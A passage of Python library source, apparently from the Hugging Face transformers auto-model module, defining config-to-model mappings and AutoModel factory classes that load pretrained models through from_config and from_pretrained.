        (CamembertConfig, CamembertForSequenceClassification),
        (XLMRobertaConfig, XLMRobertaForSequenceClassification),
        (BartConfig, BartForSequenceClassification),
        (LongformerConfig, LongformerForSequenceClassification),
        (RobertaConfig, RobertaForSequenceClassification),
        (SqueezeBertConfig, SqueezeBertForSequenceClassification),
        (BertConfig, BertForSequenceClassification),
        (XLNetConfig, XLNetForSequenceClassification),
        (MobileBertConfig, MobileBertForSequenceClassification),
        (FlaubertConfig, FlaubertForSequenceClassification),
        (XLMConfig, XLMForSequenceClassification),
        (ElectraConfig, ElectraForSequenceClassification),
        (FunnelConfig, FunnelForSequenceClassification),
        (DebertaConfig, DebertaForSequenceClassification),
        (GPT2Config, GPT2ForSequenceClassification),
        (OpenAIGPTConfig, OpenAIGPTForSequenceClassification),
        (ReformerConfig, ReformerForSequenceClassification),
    ]
)

MODEL_FOR_QUESTION_ANSWERING_MAPPING = OrderedDict(
    [
        # Model for Question Answering mapping
        (DistilBertConfig, DistilBertForQuestionAnswering),
        (AlbertConfig, AlbertForQuestionAnswering),
        (CamembertConfig, CamembertForQuestionAnswering),
        (BartConfig, BartForQuestionAnswering),
        (LongformerConfig, LongformerForQuestionAnswering),
        (XLMRobertaConfig, XLMRobertaForQuestionAnswering),
        (RobertaConfig, RobertaForQuestionAnswering),
        (SqueezeBertConfig, SqueezeBertForQuestionAnswering),
        (BertConfig, BertForQuestionAnswering),
        (XLNetConfig, XLNetForQuestionAnsweringSimple),
        (FlaubertConfig, FlaubertForQuestionAnsweringSimple),
        (MobileBertConfig, MobileBertForQuestionAnswering),
        (XLMConfig, XLMForQuestionAnsweringSimple),
        (ElectraConfig, ElectraForQuestionAnswering),
        (ReformerConfig, ReformerForQuestionAnswering),
        (FunnelConfig, FunnelForQuestionAnswering),
        (LxmertConfig, LxmertForQuestionAnswering),
    ]
)
# Maps a configuration class to the token-classification model AutoModel picks.
# Fix: the original listed (FlaubertConfig, FlaubertForTokenClassification)
# twice; the redundant second entry is removed, keeping the first occurrence
# (before XLMConfig) so lookup order is unchanged.
MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING = OrderedDict(
    [
        # Model for Token Classification mapping
        (LayoutLMConfig, LayoutLMForTokenClassification),
        (DistilBertConfig, DistilBertForTokenClassification),
        (CamembertConfig, CamembertForTokenClassification),
        (FlaubertConfig, FlaubertForTokenClassification),
        (XLMConfig, XLMForTokenClassification),
        (XLMRobertaConfig, XLMRobertaForTokenClassification),
        (LongformerConfig, LongformerForTokenClassification),
        (RobertaConfig, RobertaForTokenClassification),
        (SqueezeBertConfig, SqueezeBertForTokenClassification),
        (BertConfig, BertForTokenClassification),
        (MobileBertConfig, MobileBertForTokenClassification),
        (XLNetConfig, XLNetForTokenClassification),
        (AlbertConfig, AlbertForTokenClassification),
        (ElectraConfig, ElectraForTokenClassification),
        (FunnelConfig, FunnelForTokenClassification),
    ]
)
# Maps a configuration class to the multiple-choice model AutoModel picks.
MODEL_FOR_MULTIPLE_CHOICE_MAPPING = OrderedDict(
    [
        # Model for Multiple Choice mapping
        (CamembertConfig, CamembertForMultipleChoice),
        (ElectraConfig, ElectraForMultipleChoice),
        (XLMRobertaConfig, XLMRobertaForMultipleChoice),
        (LongformerConfig, LongformerForMultipleChoice),
        (RobertaConfig, RobertaForMultipleChoice),
        (SqueezeBertConfig, SqueezeBertForMultipleChoice),
        (BertConfig, BertForMultipleChoice),
        (DistilBertConfig, DistilBertForMultipleChoice),
        (MobileBertConfig, MobileBertForMultipleChoice),
        (XLNetConfig, XLNetForMultipleChoice),
        (AlbertConfig, AlbertForMultipleChoice),
        (XLMConfig, XLMForMultipleChoice),
        (FlaubertConfig, FlaubertForMultipleChoice),
        (FunnelConfig, FunnelForMultipleChoice),
    ]
)

# Maps a configuration class to the next-sentence-prediction model.
MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING = OrderedDict(
    [
        (BertConfig, BertForNextSentencePrediction),
        (MobileBertConfig, MobileBertForNextSentencePrediction),
    ]
)
# Shared docstring template prepended (via ``add_start_docstrings``) to every
# ``AutoModel*.from_pretrained`` method. The literal ``List options`` line is a
# placeholder later replaced by ``replace_list_option_in_docstrings``.
AUTO_MODEL_PRETRAINED_DOCSTRING = r"""
        The model class to instantiate is selected based on the :obj:`model_type` property of the config object (either
        passed as an argument or loaded from :obj:`pretrained_model_name_or_path` if possible), or when it's missing,
        by falling back to using pattern matching on :obj:`pretrained_model_name_or_path`:
        List options
        The model is set in evaluation mode by default using ``model.eval()`` (so for instance, dropout modules are
        deactivated). To train the model, you should first set it back in training mode with ``model.train()``
        Args:
            pretrained_model_name_or_path:
                Can be either:
                    - A string, the `model id` of a pretrained model hosted inside a model repo on huggingface.co.
                      Valid model ids can be located at the root-level, like ``bert-base-uncased``, or namespaced under
                      a user or organization name, like ``dbmdz/bert-base-german-cased``.
                    - A path to a `directory` containing model weights saved using
                      :func:`~transformers.PreTrainedModel.save_pretrained`, e.g., ``./my_model_directory/``.
                    - A path or url to a `tensorflow index checkpoint file` (e.g, ``./tf_model/model.ckpt.index``). In
                      this case, ``from_tf`` should be set to :obj:`True` and a configuration object should be provided
                      as ``config`` argument. This loading path is slower than converting the TensorFlow checkpoint in
                      a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.
            model_args (additional positional arguments, `optional`):
                Will be passed along to the underlying model ``__init__()`` method.
            config (:class:`~transformers.PretrainedConfig`, `optional`):
                Configuration for the model to use instead of an automatically loaded configuration. Configuration can
                be automatically loaded when:
                    - The model is a model provided by the library (loaded with the `model id` string of a pretrained
                      model).
                    - The model was saved using :meth:`~transformers.PreTrainedModel.save_pretrained` and is reloaded
                      by supplying the save directory.
                    - The model is loaded by supplying a local directory as ``pretrained_model_name_or_path`` and a
                      configuration JSON file named `config.json` is found in the directory.
            state_dict (`Dict[str, torch.Tensor]`, `optional`):
                A state dictionary to use instead of a state dictionary loaded from saved weights file.
                This option can be used if you want to create a model from a pretrained configuration but load your own
                weights. In this case though, you should check if using
                :func:`~transformers.PreTrainedModel.save_pretrained` and
                :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.
            cache_dir (:obj:`str`, `optional`):
                Path to a directory in which a downloaded pretrained model configuration should be cached if the
                standard cache should not be used.
            from_tf (:obj:`bool`, `optional`, defaults to :obj:`False`):
                Load the model weights from a TensorFlow checkpoint save file (see docstring of
                ``pretrained_model_name_or_path`` argument).
            force_download (:obj:`bool`, `optional`, defaults to :obj:`False`):
                Whether or not to force the (re-)download of the model weights and configuration files, overriding the
                cached versions if they exist.
            resume_download (:obj:`bool`, `optional`, defaults to :obj:`False`):
                Whether or not to delete incompletely received files. Will attempt to resume the download if such a
                file exists.
            proxies (:obj:`Dict[str, str]`, `optional`):
                A dictionary of proxy servers to use by protocol or endpoint, e.g., :obj:`{'http': 'foo.bar:3128',
                'http://hostname': 'foo.bar:4012'}`. The proxies are used on each request.
            output_loading_info(:obj:`bool`, `optional`, defaults to :obj:`False`):
                Whether or not to also return a dictionary containing missing keys, unexpected keys and error messages.
            local_files_only(:obj:`bool`, `optional`, defaults to :obj:`False`):
                Whether or not to only look at local files (e.g., not try downloading the model).
            revision(:obj:`str`, `optional`, defaults to :obj:`"main"`):
                The specific model version to use. It can be a branch name, a tag name, or a commit id, since we use a
                git-based system for storing models and other artifacts on huggingface.co, so ``revision`` can be any
                identifier allowed by git.
            kwargs (additional keyword arguments, `optional`):
                Can be used to update the configuration object (after it being loaded) and initiate the model (e.g.,
                :obj:`output_attentions=True`). Behaves differently depending on whether a ``config`` is provided or
                automatically loaded:
                    - If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the
                      underlying model's ``__init__`` method (we assume all relevant updates to the configuration have
                      already been done)
                    - If a configuration is not provided, ``kwargs`` will be first passed to the configuration class
                      initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of
                      ``kwargs`` that corresponds to a configuration attribute will be used to override said attribute
                      with the supplied ``kwargs`` value. Remaining keys that do not correspond to any configuration
                      attribute will be passed to the underlying model's ``__init__`` function.
"""
class AutoModel:
    r"""
    This is a generic model class that will be instantiated as one of the base model classes of the library when
    created with the :meth:`~transformers.AutoModel.from_pretrained` class method or the
    :meth:`~transformers.AutoModel.from_config` class methods.
    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    """
    def __init__(self):
        # Direct construction is forbidden on purpose; only the factory
        # classmethods below know how to pick a concrete model class.
        raise EnvironmentError(
            "AutoModel is designed to be instantiated "
            "using the `AutoModel.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModel.from_config(config)` methods."
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the base model classes of the library from a configuration.
        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModel.from_pretrained` to load the model weights.
        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:
                List options
        Examples::
            >>> from transformers import AutoConfig, AutoModel
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('bert-base-uncased')
            >>> model = AutoModel.from_config(config)
        """
        # Dispatch on the exact configuration class (no subclass matching).
        model_class = MODEL_MAPPING.get(type(config))
        if model_class is not None:
            return model_class(config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_MAPPING.keys())
            )
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the base model classes of the library from a pretrained model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::
            >>> from transformers import AutoConfig, AutoModel
            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModel.from_pretrained('bert-base-uncased')
            >>> # Update configuration during loading
            >>> model = AutoModel.from_pretrained('bert-base-uncased', output_attentions=True)
            >>> model.config.output_attentions
            True
            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
            >>> model = AutoModel.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            # No usable config supplied: resolve one from the name/path; kwargs
            # consumed by the config are stripped from what we forward below.
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        model_class = MODEL_MAPPING.get(type(config))
        if model_class is not None:
            return model_class.from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_MAPPING.keys())
            )
        )
class AutoModelForPreTraining:
    r"""
    This is a generic model class that will be instantiated as one of the model classes of the library---with the
    architecture used for pretraining this model---when created with the
    :meth:`~transformers.AutoModelForPreTraining.from_pretrained` class method or the
    :meth:`~transformers.AutoModelForPreTraining.from_config` class method.
    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    """
    def __init__(self):
        # Direct construction is forbidden; use the factory classmethods below.
        raise EnvironmentError(
            "AutoModelForPreTraining is designed to be instantiated "
            "using the `AutoModelForPreTraining.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModelForPreTraining.from_config(config)` methods."
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_PRETRAINING_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the model classes of the library---with the architecture used for pretraining this
        model---from a configuration.
        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModelForPreTraining.from_pretrained` to load the model
            weights.
        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:
                List options
        Examples::
            >>> from transformers import AutoConfig, AutoModelForPreTraining
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('bert-base-uncased')
            >>> model = AutoModelForPreTraining.from_config(config)
        """
        # Dispatch on the exact configuration class (no subclass matching).
        if type(config) in MODEL_FOR_PRETRAINING_MAPPING.keys():
            return MODEL_FOR_PRETRAINING_MAPPING[type(config)](config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_PRETRAINING_MAPPING.keys())
            )
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_PRETRAINING_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the model classes of the library---with the architecture used for pretraining this ",
        "model---from a pretrained model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::
            >>> from transformers import AutoConfig, AutoModelForPreTraining
            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModelForPreTraining.from_pretrained('bert-base-uncased')
            >>> # Update configuration during loading
            >>> model = AutoModelForPreTraining.from_pretrained('bert-base-uncased', output_attentions=True)
            >>> model.config.output_attentions
            True
            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
            >>> model = AutoModelForPreTraining.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            # Resolve a config from the name/path; kwargs the config consumes
            # are stripped from what is forwarded to the model below.
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        if type(config) in MODEL_FOR_PRETRAINING_MAPPING.keys():
            return MODEL_FOR_PRETRAINING_MAPPING[type(config)].from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_PRETRAINING_MAPPING.keys())
            )
        )
class AutoModelWithLMHead:
    r"""
    This is a generic model class that will be instantiated as one of the model classes of the library---with a
    language modeling head---when created with the
    :meth:`~transformers.AutoModelWithLMHead.from_pretrained` class method or the
    :meth:`~transformers.AutoModelWithLMHead.from_config` class method.
    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    .. warning::
        This class is deprecated and will be removed in a future version. Please use
        :class:`~transformers.AutoModelForCausalLM` for causal language models,
        :class:`~transformers.AutoModelForMaskedLM` for masked language models and
        :class:`~transformers.AutoModelForSeq2SeqLM` for encoder-decoder models.
    """
    def __init__(self):
        # Direct construction is forbidden; use the factory classmethods below.
        raise EnvironmentError(
            "AutoModelWithLMHead is designed to be instantiated "
            "using the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModelWithLMHead.from_config(config)` methods."
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_WITH_LM_HEAD_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the model classes of the library---with a language modeling head---from a configuration.
        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModelWithLMHead.from_pretrained` to load the model
            weights.
        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:
                List options
        Examples::
            >>> from transformers import AutoConfig, AutoModelWithLMHead
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('bert-base-uncased')
            >>> model = AutoModelWithLMHead.from_config(config)
        """
        # Deprecation warning emitted on every call; the class still works.
        warnings.warn(
            "The class `AutoModelWithLMHead` is deprecated and will be removed in a future version. Please use "
            "`AutoModelForCausalLM` for causal language models, `AutoModelForMaskedLM` for masked language models and "
            "`AutoModelForSeq2SeqLM` for encoder-decoder models.",
            FutureWarning,
        )
        # Dispatch on the exact configuration class (no subclass matching).
        if type(config) in MODEL_WITH_LM_HEAD_MAPPING.keys():
            return MODEL_WITH_LM_HEAD_MAPPING[type(config)](config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_WITH_LM_HEAD_MAPPING.keys())
            )
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_WITH_LM_HEAD_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the model classes of the library---with a language modeling head---from a pretrained ",
        "model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::
            >>> from transformers import AutoConfig, AutoModelWithLMHead
            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModelWithLMHead.from_pretrained('bert-base-uncased')
            >>> # Update configuration during loading
            >>> model = AutoModelWithLMHead.from_pretrained('bert-base-uncased', output_attentions=True)
            >>> model.config.output_attentions
            True
            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
            >>> model = AutoModelWithLMHead.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        # Deprecation warning emitted on every call; the class still works.
        warnings.warn(
            "The class `AutoModelWithLMHead` is deprecated and will be removed in a future version. Please use "
            "`AutoModelForCausalLM` for causal language models, `AutoModelForMaskedLM` for masked language models and "
            "`AutoModelForSeq2SeqLM` for encoder-decoder models.",
            FutureWarning,
        )
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            # Resolve a config from the name/path; kwargs the config consumes
            # are stripped from what is forwarded to the model below.
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        if type(config) in MODEL_WITH_LM_HEAD_MAPPING.keys():
            return MODEL_WITH_LM_HEAD_MAPPING[type(config)].from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_WITH_LM_HEAD_MAPPING.keys())
            )
        )
class AutoModelForCausalLM:
    r"""
    This is a generic model class that will be instantiated as one of the model classes of the library---with a causal
    language modeling head---when created with the
    :meth:`~transformers.AutoModelForCausalLM.from_pretrained` class method or the
    :meth:`~transformers.AutoModelForCausalLM.from_config` class method.
    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    """
    def __init__(self):
        # Direct construction is forbidden; use the factory classmethods below.
        raise EnvironmentError(
            "AutoModelForCausalLM is designed to be instantiated "
            "using the `AutoModelForCausalLM.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModelForCausalLM.from_config(config)` methods."
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_CAUSAL_LM_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the model classes of the library---with a causal language modeling head---from a
        configuration.
        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModelForCausalLM.from_pretrained` to load the model
            weights.
        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:
                List options
        Examples::
            >>> from transformers import AutoConfig, AutoModelForCausalLM
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('gpt2')
            >>> model = AutoModelForCausalLM.from_config(config)
        """
        # Dispatch on the exact configuration class (no subclass matching).
        if type(config) in MODEL_FOR_CAUSAL_LM_MAPPING.keys():
            return MODEL_FOR_CAUSAL_LM_MAPPING[type(config)](config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_CAUSAL_LM_MAPPING.keys())
            )
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_CAUSAL_LM_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the model classes of the library---with a causal language modeling head---from a "
        "pretrained model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::
            >>> from transformers import AutoConfig, AutoModelForCausalLM
            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModelForCausalLM.from_pretrained('gpt2')
            >>> # Update configuration during loading
            >>> model = AutoModelForCausalLM.from_pretrained('gpt2', output_attentions=True)
            >>> model.config.output_attentions
            True
            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/gpt2_tf_model_config.json')
            >>> model = AutoModelForCausalLM.from_pretrained('./tf_model/gpt2_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            # Resolve a config from the name/path; kwargs the config consumes
            # are stripped from what is forwarded to the model below.
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        if type(config) in MODEL_FOR_CAUSAL_LM_MAPPING.keys():
            return MODEL_FOR_CAUSAL_LM_MAPPING[type(config)].from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_CAUSAL_LM_MAPPING.keys())
            )
        )
class AutoModelForMaskedLM:
    r"""
    This is a generic model class that will be instantiated as one of the model classes of the library---with a masked
    language modeling head---when created with the
    :meth:`~transformers.AutoModelForMaskedLM.from_pretrained` class method or the
    :meth:`~transformers.AutoModelForMaskedLM.from_config` class method.
    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    """
    def __init__(self):
        # Direct construction is forbidden; use the factory classmethods below.
        raise EnvironmentError(
            "AutoModelForMaskedLM is designed to be instantiated "
            "using the `AutoModelForMaskedLM.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModelForMaskedLM.from_config(config)` methods."
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_MASKED_LM_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the model classes of the library---with a masked language modeling head---from a
        configuration.
        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModelForMaskedLM.from_pretrained` to load the model
            weights.
        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:
                List options
        Examples::
            >>> from transformers import AutoConfig, AutoModelForMaskedLM
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('bert-base-uncased')
            >>> model = AutoModelForMaskedLM.from_config(config)
        """
        # Dispatch on the exact configuration class (no subclass matching).
        if type(config) in MODEL_FOR_MASKED_LM_MAPPING.keys():
            return MODEL_FOR_MASKED_LM_MAPPING[type(config)](config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_MASKED_LM_MAPPING.keys())
            )
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_MASKED_LM_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the model classes of the library---with a masked language modeling head---from a "
        "pretrained model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::
            >>> from transformers import AutoConfig, AutoModelForMaskedLM
            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModelForMaskedLM.from_pretrained('bert-base-uncased')
            >>> # Update configuration during loading
            >>> model = AutoModelForMaskedLM.from_pretrained('bert-base-uncased', output_attentions=True)
            >>> model.config.output_attentions
            True
            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
            >>> model = AutoModelForMaskedLM.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            # Resolve a config from the name/path; kwargs the config consumes
            # are stripped from what is forwarded to the model below.
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        if type(config) in MODEL_FOR_MASKED_LM_MAPPING.keys():
            return MODEL_FOR_MASKED_LM_MAPPING[type(config)].from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_MASKED_LM_MAPPING.keys())
            )
        )
class AutoModelForSeq2SeqLM:
    r"""
    This is a generic model class that will be instantiated as one of the model classes of the library---with a
    sequence-to-sequence language modeling head---when created with the
    :meth:`~transformers.AutoModelForSeq2SeqLM.from_pretrained` class method or the
    :meth:`~transformers.AutoModelForSeq2SeqLM.from_config` class method.
    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    """
    def __init__(self):
        # Direct construction is forbidden; use the factory classmethods below.
        raise EnvironmentError(
            "AutoModelForSeq2SeqLM is designed to be instantiated "
            "using the `AutoModelForSeq2SeqLM.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModelForSeq2SeqLM.from_config(config)` methods."
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the model classes of the library---with a sequence-to-sequence language modeling
        head---from a configuration.
        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModelForSeq2SeqLM.from_pretrained` to load the model
            weights.
        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:
                List options
        Examples::
            >>> from transformers import AutoConfig, AutoModelForSeq2SeqLM
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('t5')
            >>> model = AutoModelForSeq2SeqLM.from_config(config)
        """
        # Dispatch on the exact configuration class (no subclass matching).
        if type(config) in MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.keys():
            return MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING[type(config)](config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.keys()),
            )
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the model classes of the library---with a sequence-to-sequence language modeling "
        "head---from a pretrained model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::
            >>> from transformers import AutoConfig, AutoModelForSeq2SeqLM
            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModelForSeq2SeqLM.from_pretrained('t5-base')
            >>> # Update configuration during loading
            >>> model = AutoModelForSeq2SeqLM.from_pretrained('t5-base', output_attentions=True)
            >>> model.config.output_attentions
            True
            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/t5_tf_model_config.json')
            >>> model = AutoModelForSeq2SeqLM.from_pretrained('./tf_model/t5_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            # Resolve a config from the name/path; kwargs the config consumes
            # are stripped from what is forwarded to the model below.
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        if type(config) in MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.keys():
            return MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING[type(config)].from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.keys()),
            )
        )
class AutoModelForSequenceClassification:
    r"""
    This is a generic model class that will be instantiated as one of the model classes of the library---with a
    sequence classification head---when created with the
    :meth:`~transformers.AutoModelForSequenceClassification.from_pretrained` class method or the
    :meth:`~transformers.AutoModelForSequenceClassification.from_config` class method.
    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    """
    def __init__(self):
        # Direct construction is forbidden; use the factory classmethods below.
        raise EnvironmentError(
            "AutoModelForSequenceClassification is designed to be instantiated "
            "using the `AutoModelForSequenceClassification.from_pretrained(pretrained_model_name_or_path)` or "
